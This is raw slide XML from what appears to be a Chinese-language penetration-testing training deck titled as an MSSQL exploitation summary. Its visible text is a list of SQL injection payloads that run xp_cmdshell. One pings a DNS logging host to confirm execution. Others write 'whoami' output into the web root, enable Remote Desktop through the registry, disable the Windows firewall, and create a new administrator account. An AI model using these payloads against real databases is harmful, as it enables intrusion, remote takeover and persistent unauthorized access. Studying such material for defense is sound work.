                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ln w="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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3116348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DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="921572" y="2382235"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=1';exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.sys.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 'ping -n 1 d3rymk.dnslog.cn'--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BCE03-8D9E-4CE6-95DA-F6001CBAC070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906719" y="1499986"/>
            <a:ext cx="3655121" cy="698268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8C033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>利用总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8C033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4FFFE6-75ED-4B09-BE2A-F6514086A878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="2553904" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ln w="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3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56AAB349-66BA-4CA4-9B3C-6CB0A5272E72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3638348" y="4059074"/>
            <a:ext cx="5143476" cy="2415669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258832783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DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="921572" y="2382235"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=1';exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.sys.xp_cmdshell</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whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> &gt; c:\inetpub\wwwroot\1.txt'--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=1';exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.sys.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 'REG ADD HKLM\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\Control\Terminal" "Server /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fDenyTSConnections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> /t REG_DWORD /d 00000000 /f'--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=1';exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.sys.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> firewall set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>opmode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> disable'--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=1';exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.sys.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 'net user admin 1qaz!QAZ /add'--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=1';exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.sys.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 'net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> administrators admin /add'--+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BCE03-8D9E-4CE6-95DA-F6001CBAC070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906719" y="1499986"/>
            <a:ext cx="3655121" cy="698268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8C033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>利用总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8C033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
